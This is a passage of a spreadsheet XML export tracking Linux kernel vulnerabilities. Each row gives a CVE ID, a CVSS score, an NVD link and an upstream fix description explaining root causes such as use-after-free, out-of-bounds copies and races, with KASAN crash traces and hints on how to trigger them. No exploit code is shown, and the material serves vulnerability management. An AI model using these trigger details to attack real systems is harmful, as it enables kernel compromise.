  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  Read of size 1 at addr ff110001039c6e08 by task poc/771
  Call Trace:
  ? ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  packet_sendmsg (net/packet/af_packet.c:2959 net/packet/af_packet.c:3053 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 8 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97602</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97611</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix use-after-free of the flow table mask array
tbl_mask_array_realloc() retires the old mask_array before it stops being
reachable:
	old = ovsl_dereference(tbl-&gt;mask_array);
	if (old) {
		...
		call_rcu(&amp;old-&gt;rcu, mask_array_rcu_cb);
	}
	rcu_assign_pointer(tbl-&gt;mask_array, new);
call_rcu() only waits for read-side critical sections already in flight.
tbl-&gt;mask_array still points at old between the call_rcu() and the
rcu_assign_pointer(), so a reader entering ovs_flow_tbl_lookup_stats() in
that window picks up old in a fresh critical section that the pending
grace period does not cover.
tbl_mask_array_realloc() runs in process context under ovs_mutex, so the
window is preemptible and can outlast the grace period. Then
mask_array_rcu_cb() frees old before the swap runs:
  BUG: KASAN: slab-use-after-free in flow_lookup.constprop.0+0x2bf/0x2f0
  Read of size 8 at addr ffff888020b3e018 by task poc/741
   flow_lookup.constprop.0+0x2bf/0x2f0
   ovs_flow_tbl_lookup_stats+0x4a3/0x5c0
   ovs_dp_process_packet+0x19c/0x710
   ovs_vport_receive+0x243/0x390
   internal_dev_xmit+0x81/0x170
  Freed by task 728:
   kfree+0x16a/0x4e0
   rcu_core+0x853/0x1030
Publish the new array before retiring the old one. The kfree_rcu() that
call_rcu() replaced ran after the swap.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97611</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97612</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin, rust</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr"/>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mpls: clear inner_protocol when the last label is popped
skb_mpls_push() records the pre-encapsulation network header once, gated
on !skb-&gt;inner_protocol. skb_mpls_pop() never clears that record, so it
outlives the encapsulation it describes.
Open vSwitch can then re-push MPLS onto a packet whose
inner_network_header still points at the older, deeper offset: push a
label, pop every label, recirculate (ovs_flow_key_update() re-derives
key-&gt;eth.type and resets network_header, but leaves inner_*), then push
again. ovs_fragment() trusts the record:
	skb-&gt;network_header = skb-&gt;inner_network_header;
so skb_network_offset() goes negative. The bound check is signed:
	if (skb_network_offset(skb) &gt; MAX_L2_LEN)
a negative offset passes it, and prepare_frag() widens the value:
	unsigned int hlen = skb_network_offset(skb);
	memcpy(&amp;data-&gt;l2_data, skb-&gt;data, hlen);
which is a ~4GiB memcpy out of a 30-byte per-CPU buffer.
Reproduced on v7.3-rc1. RDX is the truncated length, (unsigned int)(-8):
  BUG: unable to handle page fault for address: ffffe8ffffc16000
  #PF: supervisor write access in kernel mode
  Oops: 0002 [#1] SMP KASAN NOPTI
  RIP: 0010:memcpy+0x8/0x20
  RDX: 00000000fffffff8 RSI: ffff888105d732db RDI: ffffe8ffffc16000
   prepare_frag+0x3df/0x4e0
   ovs_fragment+0x589/0x7e0
   do_output+0x4ce/0x5e0
   do_execute_actions+0x55d2/0x7b30
   ovs_execute_actions+0xea/0x450
Same root-cause shape as commit 975b5b067f52 ("ipv6: sr: restore network
header before routing and forwarding"): a stale network header offset
reaching a consumer that widens it. Here it originates in the MPLS
push/pop path.
Clear inner_protocol once the packet is no longer MPLS, so a later push
re-records the current header. net/sched/act_mpls.c is the only other
skb_mpls_pop() caller and gets the same fix; sch_frag.c saves and
restores inner_protocol around fragmentation in the same way OVS does.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97612</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97903</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr"/>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
exit: hold a reference to thread_pid across proc_flush_pid
Commit 0a36bad01731 ("release_task: kill the no longer needed
get/put_pid(thread_pid)") removed the reference around proc_flush_pid().
It assumed that free_pids(post.pids) at the end of release_task() would
keep thread_pid alive until then.
That assumption is wrong.  __change_pid() only records a detached PID in
post.pids when pid_has_task() is false for every PIDTYPE.  If another task
still uses the exiting task's PID as its process group or session ID,
__unhash_process() removes the exiting task's PIDTYPE_PID link but leaves
the PID out of post.pids.  release_task() therefore holds no reference to
it after dropping tasklist_lock.
The other task can then remove the remaining PIDTYPE links.  Its
free_pids() call schedules delayed_put_pid(), and the RCU callback can free
the PID before the first release_task() reaches proc_flush_pid().
An unprivileged reproducer races wait4(-1) against setsid() to trigger this
ordering.  Three of three fresh v7.2 KASAN boots reported:
    BUG: KASAN: slab-use-after-free in
    proc_invalidate_siblings_dcache+0x3e2/0x3f0
    Read of size 8 by task h7_pid_reaper/1921
    Call Trace:
     proc_invalidate_siblings_dcache
     release_task
     wait_consider_task
     __do_wait
     do_wait
     kernel_wait4
    Freed by task 0:
     kmem_cache_free
     put_pid
     delayed_put_pid
     rcu_core
    Last potentially related work creation:
     __call_rcu_common
     free_pids
     ksys_setsid
KASAN identified a 144-byte object from the pid cache and located the bad
read 80 bytes into the freed object, matching pid-&gt;inodes.  With an
explicit reference, three of three fresh boots completed without a KASAN
report.  The concurrent RCU callback dropped its reference while
proc_flush_pid() was protected, and the balancing put_pid() performed the
final free afterward.
Take a reference before __unhash_process() clears p-&gt;thread_pid and release
it after proc_flush_pid() completes.
A tested source reproducer is available privately on request.  No
controlled read or write, information leak, or privilege escalation is
claimed.  The mainline patch applies directly to v6.19.y and newer;
v6.16.y through v6.18.y need a context-adjusted backport.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97903</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97910</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr"/>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: sprd: validate compress buffer sizes against fixed allocations
sprd_platform_compr_open() allocates the stage 0 IRAM buffer (32K data
area) and the stage 1 DDR buffer (2M data area) with fixed sizes, but
sprd_platform_compr_copy() derives all copy lengths from the user
controlled runtime-&gt;fragment_size and the write() count, never
comparing them against the physical buffer sizes. The compress core
only checks fragment_size * fragments for an u32 overflow in
snd_compress_check_input(), so a local user can configure a logical
buffer of up to ~4GB via SNDRV_COMPRESS_SET_PARAMS, far exceeding the
fixed allocations.
A fragment_size larger than the 32K IRAM data area makes the stage 0
copy_from_user() overflow past the IRAM allocation, and a buffer_size
larger than the 2M DDR buffer makes the wrapping copy at the end of
sprd_platform_compr_copy() write fully user controlled data past the
buffer. No SNDRV_PCM_TRIGGER_START is needed, a write() in SETUP
state reaches the copy callback directly.
Reject parameters that do not fit into the fixed buffers in
set_params(), and fix the advertised max fragment size: 128K never
fitted into the 32K IRAM buffer. The caps values may have been carried over
from the qdsp6 driver, which allocates its buffers according to the
advertised maxima, unlike this driver. With 32K as max fragment size
the advertised limits are self-consistent: 32K * 64 = 2M equals the
DDR buffer size.
Discovered by Atuin - Automated Vulnerability Discovery Engine.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97910</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97911</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr"/>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure SRAM region size matches job
It is possible for userspace to set the job SRAM size to 0, but then still
have SRAM accesses in the command stream. When the job SRAM size is 0,
setting the region base register is skipped and a stale base address from
a prior job is used.
Check the region size against the job's SRAM size instead of just the size
of the SRAM. The job's SRAM size was already checked against the total SRAM
size.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97911</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97937</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr"/>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ftrace: fork: Initialize function graph state before copy_exec_state()
dup_task_struct() copies the parent's task_struct, including ret_stack.
ftrace_graph_init_task() clears the copied function graph state, but it
currently runs after copy_exec_state().
For non-CLONE_VM forks, copy_exec_state() allocates a new task_exec_state.
If that allocation fails, copy_process() reaches bad_fork_free and
free_task() calls ftrace_graph_exit_task(). Since the child still carries
the parent's ret_stack pointer, the unwind frees the parent's active
function graph return stack. The parent subsequently accesses freed memory
from function_graph_enter_regs().
KASAN reports:
[   22.190920] ==================================================================
[   22.195899] BUG: KASAN: slab-use-after-free in function_graph_enter_regs+0xa76/0xb90
[   22.200747] Write of size 8 at addr ff110000054dc0a8 by task repro/1
[   22.205134]
[   22.210770] CPU: 0 UID: 0 PID: 1 Comm: repro Not tainted 7.2.0-07732-g9328b3b03bdc-dirty #3 PREEMPT(lazy)
[   22.212576] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   22.213750] Call Trace:
[   22.215271]  &lt;TASK&gt;
[   22.216242]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.217774]  dump_stack_lvl+0x4e/0x70
[   22.220531]  print_report+0x157/0x4b4
[   22.223202]  ? fixup_red_left+0x9/0x30
[   22.224407]  ? complete_report_info+0x83/0x110
[   22.226679]  ? function_graph_enter_regs+0xa76/0xb90
[   22.228084]  kasan_report+0xce/0x100
[   22.230109]  ? function_graph_enter_regs+0xa76/0xb90
[   22.232860]  ? stack_trace_save+0x4/0xd0
[   22.234156]  function_graph_enter_regs+0xa76/0xb90
[   22.236090]  ? kasan_save_stack+0x30/0x50
[   22.237752]  ? __pfx_function_graph_enter_regs+0x10/0x10
[   22.238694]  ? ring_buffer_lock_reserve+0x345/0xf80
[   22.239628]  ? stack_trace_save+0x4/0xd0
[   22.242121]  ? stack_trace_save+0x4/0xd0
[   22.243588]  ftrace_graph_func+0xda/0x160
[   22.245362]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.246520]  0xffffffffa0000095
[   22.250528]  ? stack_trace_save+0x9/0xd0
[   22.251757]  ? ring_buffer_unlock_commit+0x11d/0x5c0
[   22.253152]  stack_trace_save+0x9/0xd0
[   22.254264]  kasan_save_stack+0x30/0x50
[   22.273631]  kasan_save_track+0x14/0x30
[   22.276763]  kasan_save_free_info+0x3b/0x70
[   22.278296]  __kasan_slab_free+0x43/0x70
[   22.280157]  kmem_cache_free+0xbf/0x3b0
[   22.282963]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.284001]  free_task+0xa2/0x160
[   22.285699]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.286752]  copy_process+0x2aae/0x7bc0
Initialize the child function graph state immediately after
dup_task_struct(), before the first fallible operation.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97937</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97940</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr"/>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix fib6 walker UAF on seq stop
ipv6_route_iter_active() treats a walker in FWS_U at the table root as
already unlinked. fib6_del_route() can move a still-linked walker into
that same state when the current leaf is the last route at the root,
so ipv6_route_native_seq_stop() skips fib6_walker_unlink(). The seq
private object can then be freed while it remains on
net-&gt;ipv6.fib6_walkers. A later route deletion walks the dangling list
and uses the freed walker.
Use the list head as membership state and reinitialize it when
unlinking. Keep the existing w-&gt;node check so a never-started iterator
with a zeroed private object is not treated as linked.
The same stop helper is used by /proc/net/ipv6_route and by the BPF
ipv6_route iterator. The BPF show path only widens the race.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97940</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97941</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr"/>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/slab: take n-&gt;list_lock in __slab_try_return_freelist() to avoid race
Commit ba7425312607 ("mm, slab: add an optimistic
__slab_try_return_freelist()") incorrectly assumed that nobody has freed
an object to the slab as long as slab-&gt;freelist is NULL and cmpxchg
succeeds.
However, as reported by Hyunwoo Kim [1], other CPUs might have freed
an object to the slab, insert the slab to the partial list, then
allocated an object from the slab, and be in the middle of removing
the slab from the list under n-&gt;list_lock.
Since __refill_objects_node() puts the slab back on pc.slabs
outside n-&gt;list_lock, it might insert the slab into that list while
the slab is concurrently being removed from n-&gt;partial.
This led to a list corruption [1]:
  list_add corruption. next-&gt;prev should be prev
  (ffff888100000248), but was dead000000000122.
  (next=ffffea000416e410).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP NOPTI
  CPU: 1 UID: 65534 PID: 144 Comm: poc Not tainted
  7.2.0-16172-gcf72cbb39da8-dirty #1 PREEMPT(lazy)
  RIP: 0010:__list_add_valid_or_report+0x80/0xd0
  ...
  Call Trace:
   alloc_from_new_slab+0x183/0x300
   ___slab_alloc+0x31c/0x890
   __kmalloc_noprof+0x3d4/0x800
   lsm_blob_alloc+0x2d/0x50
   security_msg_msg_alloc+0x26/0x90
   load_msg+0x1aa/0x210
   do_msgsnd+0x91/0x800
   do_syscall_64+0x109/0x5d0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
  ...
  Kernel panic - not syncing: Fatal exception
This is a classic ABA problem where cmpxchg succeeds but the state has
changed since __refill_objects_node() took the freelist from the slab.
As Vlastimil Babka mentioned [2], it should be rare to return more than
one slab (due to the racy read of slab-&gt;counters in
get_partial_node_bulk()). Therefore, instead of introducing additional
complexity, acquire and release n-&gt;list_lock twice in the worst case.
Return the slab directly to the partial list and hold n-&gt;list_lock
across the cmpxchg and add_partial(). This is similar to the initial
version of commit ba7425312607 [3]. This is enough to avoid the race as
the list manipulation is serialized by n-&gt;list_lock. While at it,
bring back unlikely() hint now that the condition is unlikely.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97941</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97971</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr"/>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nstree: check listing permission before taking a namespace reference
legitimize_ns() takes a reference on the candidate namespace before
may_list_ns() has decided whether the caller may see it. The
__free(ns_put) cleanup on the denied path can drop the last reference to a
mount namespace while we still hold the rcu read lock, and put_mnt_ns()
may sleep there. This is the same problem commit 2ec2aff3c8e2 ("ns: make
sure reference are dropped outside of rcu lock") fixed for the put_user()
path. Neither ns_requested() nor may_list_ns() needs a reference, both
only look at the namespace type and at the caller's own namespaces, so do
the checks first and take the reference last.
Splat:
  Voluntary context switch within RCU read-side critical section!
  WARNING: kernel/rcu/tree_plugin.h:332 at rcu_note_context_switch+0x238/0x2a0, CPU#5: a/3442
  CPU: 5 UID: 1000 PID: 3442 Comm: a Not tainted 7.0.0-30-generic #30-Ubuntu PREEMPT(lazy)
  RIP: 0010:rcu_note_context_switch+0x238/0x2a0
  Call Trace:
   &lt;TASK&gt;
   __schedule+0xcf/0x650
   schedule+0x27/0x90
   schedule_preempt_disabled+0x15/0x30
   __mutex_lock.constprop.0+0x550/0xaf0
   __mutex_lock_slowpath+0x13/0x20
   mutex_lock+0x3b/0x50
   exp_funnel_lock+0xb2/0x260
   synchronize_rcu_expedited+0xe7/0x220
   namespace_unlock+0x26a/0x320
   put_mnt_ns+0xd3/0x120
   mntns_put+0xe/0x20
   do_listns+0x13e/0x560
   __do_sys_listns+0x126/0x2d0
   __x64_sys_listns+0x20/0x30
   x64_sys_call+0x2366/0x2390
   do_syscall_64+0x105/0x5a0
   entry_SYSCALL_64_after_hwframe+0x76/0x7e
   &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97971</t>
        </is>
      </c>
    </row>
    <row r="111">
